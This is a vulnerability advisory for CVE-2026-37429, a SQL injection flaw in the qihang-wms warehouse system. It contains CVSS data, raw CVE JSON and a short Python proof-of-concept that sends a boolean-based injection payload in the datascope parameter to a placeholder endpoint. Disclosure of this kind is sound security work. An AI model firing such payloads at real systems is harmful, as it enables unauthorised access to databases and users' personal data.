Security Vulnerability Report
中文
CVE-2026-37429 CVSS 6.5 MEDIUM

CVE-2026-37429

Published: 2026-05-13 14:17:32
Last Modified: 2026-05-13 19:17:12

Description

qihang-wms commit 75c15a was discovered to contain a SQL injection vulnerability via the datascope parameter in the SysUserMapper.xml file. This vulnerability allows attackers to access sensitive database information, including users' Personally Identifiable Information (PII) via a crafted SQL statement.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

qihang-wms commit 75c15a

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (Replace with actual vulnerable endpoint) target_url = "http://target-domain.com/api/sysUser/list" # Malicious payload targeting the 'datascope' parameter # Using a simple boolean-based SQL injection test payload = { "datascope": "1' AND 1=1-- " } try: # Send GET request with the malicious payload response = requests.get(target_url, params=payload) # Check if the response indicates successful injection if response.status_code == 200: print("[+] Potential SQL Injection vulnerability detected.") print("[+] Response:", response.text[:200]) else: print("[-] Request returned status code:", response.status_code) except Exception as e: print("[!] Error occurred:", str(e))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-37429", "sourceIdentifier": "[email protected]", "published": "2026-05-13T14:17:32.287", "lastModified": "2026-05-13T19:17:12.330", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "qihang-wms commit 75c15a was discovered to contain a SQL injection vulnerability via the datascope parameter in the SysUserMapper.xml file. This vulnerability allows attackers to access sensitive database information, including users' Personally Identifiable Information (PII) via a crafted SQL statement."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://gist.github.com/Y4y17/6587147a37eba5b31de832e067f317ef", "source": "[email protected]"}, {"url": "https://github.com/Y4y17/CVE/blob/main/%E5%90%AF%E8%88%AA%E7%94%B5%E5%95%86WMS/SQL%20Injection%20Vulnerability%20-%202.md", "source": "[email protected]"}]}}